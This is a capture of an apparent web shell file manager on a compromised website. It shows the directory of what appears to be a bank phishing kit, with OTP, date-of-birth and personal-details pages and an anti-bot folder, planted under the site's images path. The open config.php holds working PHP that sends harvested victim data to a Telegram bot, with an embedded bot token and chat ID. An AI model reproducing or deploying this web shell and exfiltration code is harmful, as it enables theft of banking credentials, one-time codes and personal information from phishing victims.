X7ROOT File Manager
Current Path:
/home/seodomino/public_html/images/evcqltaj/family-access
home
/
seodomino
/
public_html
/
images
/
evcqltaj
/
family-access
/
📁
..
📄
Alkami.woff2
(40.98 KB)
📁
antibots
📄
c.html
(4.41 KB)
📄
config.php
(798 B)
📁
css
📄
dob.html
(5.89 KB)
📄
favicon.ico
(1.04 KB)
📁
file
📄
glyphicons-halflings-regular.woff
(17.61 KB)
📄
index2.html
(10.51 KB)
📄
info.html
(8.75 KB)
📄
isotope.min.css
(16.45 KB)
📁
js
📄
me.php
(56 B)
📄
otp.html
(4.9 KB)
📄
otp2.html
(4.92 KB)
📄
otp3.html
(5.06 KB)
📄
personal.html
(6.12 KB)
📄
personal2.html
(5.83 KB)
📄
r.php
(1.43 KB)
📄
redirect.php
(736 B)
📄
ss.html
(9.86 KB)
Editing: config.php
<?php function send_telegram_msg($message){ // Put Your Telegram Information Here for result to telegram $botToken = '7769181278:AAF0x-txsMEd7SF6B-JOuQtfUZOHYweB0RM';// your telegram bottoken from bot father for $chat_id = ['5947331549'];// your telegram chat it from userinfobot $website="https://api.telegram.org/bot".$botToken; foreach($chat_id as $ch){ $params=[ 'chat_id'=>$ch, 'text'=>$message, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 3); curl_setopt($ch, CURLOPT_POST, 3); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } return true; } ?>
Upload File
Create Folder